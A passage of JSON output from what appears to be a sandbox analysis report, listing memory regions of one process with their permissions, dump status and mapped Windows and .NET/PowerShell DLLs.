"\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db", "id": "region_895", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db", "region_type": "memory_mapped_file", "start_va": 4653056, "timestamp": "00:00:46.531", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000896-addr_0x0000000001bd0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 30212095, "entry_point": 0, "filename": null, "id": "region_896", "name": "private_0x0000000001bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29163520, "timestamp": "00:00:46.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30216191, "entry_point": 0, "filename": null, "id": "region_897", "name": "pagefile_0x0000000001cd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30212096, "timestamp": "00:00:46.532", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000898-addr_0x0000000001ec0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32505855, "entry_point": 0, "filename": null, "id": "region_898", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:00:46.532", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000899-addr_0x0000000002680000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 40370176, "type": "region", "version": 1 }, "end_va": 40632319, "entry_point": 0, "filename": null, "id": "region_899", "name": "private_0x0000000002680000", "norm_filename": null, "region_type": "private_memory", "start_va": 40370176, "timestamp": "00:00:46.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1954021376, "type": "region", "version": 1 }, "end_va": 1954332671, "entry_point": 1954032660, "filename": "\\Windows\\SysWOW64\\apphelp.dll", "id": "region_900", "name": "apphelp.dll", "norm_filename": "c:\\windows\\syswow64\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1954021376, "timestamp": "00:00:46.532", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000901-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_901", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:46.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1954480128, "type": "region", "version": 1 }, "end_va": 1954668543, "entry_point": 1954487226, "filename": "\\Windows\\SysWOW64\\shdocvw.dll", "id": "region_902", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\syswow64\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1954480128, "timestamp": "00:00:46.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1966866432, "type": "region", "version": 1 }, "end_va": 1966903295, "entry_point": 1966871870, "filename": "\\Windows\\SysWOW64\\linkinfo.dll", "id": "region_903", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\syswow64\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1966866432, "timestamp": "00:00:46.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966866431, "entry_point": 1966415717, "filename": "\\Windows\\SysWOW64\\ntshrui.dll", "id": "region_904", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\syswow64\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:00:46.657", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_905", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:00:46.658", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000906-addr_0x0000000001f20000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 32899071, "entry_point": 0, "filename": null, "id": "region_906", "name": "private_0x0000000001f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 32636928, "timestamp": "00:00:46.662", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000907-addr_0x00000000027e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 41811968, "type": "region", "version": 1 }, "end_va": 42074111, "entry_point": 0, "filename": null, "id": "region_907", "name": "private_0x00000000027e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41811968, "timestamp": "00:00:46.662", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966256127, "entry_point": 1966215680, "filename": "\\Windows\\SysWOW64\\cscapi.dll", "id": "region_908", "name": "cscapi.dll", "norm_filename": "c:\\windows\\syswow64\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:46.662", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000909-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_909", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:46.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1966145536, "type": "region", "version": 1 }, "end_va": 1966186495, "entry_point": 1966165280, "filename": "\\Windows\\SysWOW64\\slc.dll", "id": "region_910", "name": "slc.dll", "norm_filename": "c:\\windows\\syswow64\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1966145536, "timestamp": "00:00:46.664", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_911", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:00:46.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_912", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:00:46.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1947926528, "type": "region", "version": 1 }, "end_va": 1948426239, "entry_point": 1947934536, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_913", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1947926528, "timestamp": "00:00:46.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4591615, "entry_point": 0, "filename": null, "id": "region_914", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:00:46.821", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000915-addr_0x0000000001e10000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 31522816, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_915", "name": "private_0x0000000001e10000", "norm_filename": null, "region_type": "private_memory", "start_va": 31522816, "timestamp": "00:00:46.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1852243968, "type": "region", "version": 1 }, "end_va": 1858187263, "entry_point": 1852243968, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_916", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1852243968, "timestamp": "00:00:46.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1954000895, "entry_point": 1953375019, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_917", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:00:46.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 30543871, "entry_point": 0, "filename": null, "id": "region_918", "name": "pagefile_0x0000000001d20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30539776, "timestamp": "00:00:47.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30605312, "type": "region", "version": 1 }, "end_va": 30609407, "entry_point": 0, "filename": null, "id": "region_919", "name": "pagefile_0x0000000001d30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30605312, "timestamp": "00:00:47.394", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000920-addr_0x0000000001d40000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_920", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:00:47.394", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000921-addr_0x0000000001d50000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_921", "name": "private_0x0000000001d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 30736384, "timestamp": "00:00:47.394", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000922-addr_0x0000000001da0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31129599, "entry_point": 0, "filename": null, "id": "region_922", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:00:47.395", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000923-addr_0x0000000001db0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 31195135, "entry_point": 0, "filename": null, "id": "region_923", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:00:47.395", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000924-addr_0x0000000001dc0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 31260671, "entry_point": 0, "filename": null, "id": "region_924", "name": "private_0x0000000001dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31195136, "timestamp": "00:00:47.395", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000925-addr_0x0000000001dd0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 31326207, "entry_point": 0, "filename": null, "id": "region_925", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:00:47.395", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000926-addr_0x00000000026c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_230", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 40632320, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_926", "name": "private_0x00000000026c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40632320, "timestamp": "00:00:47.396", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000927-addr_0x0000000002700000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 41156607, "entry_point": 0, "filename": null, "id": "region_927", "name": "private_0x0000000002700000", "norm_filename": null, "region_type": "private_memory", "start_va": 40894464, "timestamp": "00:00:47.396", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000928-addr_0x0000000002740000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41811967, "entry_point": 0, "filename": null, "id": "region_928", "name": "private_0x0000000002740000", "norm_filename": null, "region_type": "private_memory", "start_va": 41156608, "timestamp": "00:00:47.396", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000929-addr_0x0000000002820000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 42074112, "type": "region", "version": 1 }, "end_va": 42336255, "entry_point": 0, "filename": null, "id": "region_929", "name": "private_0x0000000002820000", "norm_filename": null, "region_type": "private_memory", "start_va": 42074112, "timestamp": "00:00:47.396", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000930-addr_0x00000000029b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 43778047, "entry_point": 0, "filename": null, "id": "region_930", "name": "private_0x00000000029b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43712512, "timestamp": "00:00:47.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 43778048, "type": "region", "version": 1 }, "end_va": 77332479, "entry_point": 0, "filename": null, "id": "region_931", "name": "private_0x00000000029c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43778048, "timestamp": "00:00:47.397", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000932-addr_0x0000000004a20000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 77725696, "type": "region", "version": 1 }, "end_va": 77987839, "entry_point": 0, "filename": null, "id": "region_932", "name": "private_0x0000000004a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 77725696, "timestamp": "00:00:47.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1840709632, "type": "region", "version": 1 }, "end_va": 1852211199, "entry_point": 1840709632, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_933", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1840709632, "timestamp": "00:00:47.398", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000934-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_934", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:00:47.407", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000935-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_935", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:00:47.407", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000936-addr_0x0000000001de0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31326208, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_936", "name": "private_0x0000000001de0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31326208, "timestamp": "00:00:48.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 77987840, "type": "region", "version": 1 }, "end_va": 81010687, "entry_point": 77987840, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_937", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 77987840, "timestamp": "00:00:48.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1832124416, "type": "region", "version": 1 }, "end_va": 1832652799, "entry_point": 1832124416, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_938", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1832124416, "timestamp": "00:00:48.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1832714240, "type": "region", "version": 1 }, "end_va": 1840693247, "entry_point": 1832714240, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_939", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1832714240, "timestamp": "00:00:48.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1820131328, "type": "region", "version": 1 }, "end_va": 1829019647, "entry_point": 1820131328, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll", "id": "region_940", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1820131328, "timestamp": "00:00:48.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_941", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:00:48.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1829044224, "type": "region", "version": 1 }, "end_va": 1832067071, "entry_point": 1831726110, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_942", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1829044224, "timestamp": "00:00:48.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 31404031, "entry_point": 31391744, "filename": "\\Windows\\SysWOW64\\l_intl.nls", "id": "region_944", "name": "l_intl.nls", "norm_filename": "c:\\windows\\syswow64\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 31391744, "timestamp": "00:00:48.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 43122687, "entry_point": 42336256, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_945", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 42336256, "timestamp": "00:00:48.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2005336064, "type": "region", "version": 1 }, "end_va": 2005356543, "entry_point": 2005341240, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_946", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2005336064, "timestamp": "00:00:48.900", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000947-addr_0x0000000001e00000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" 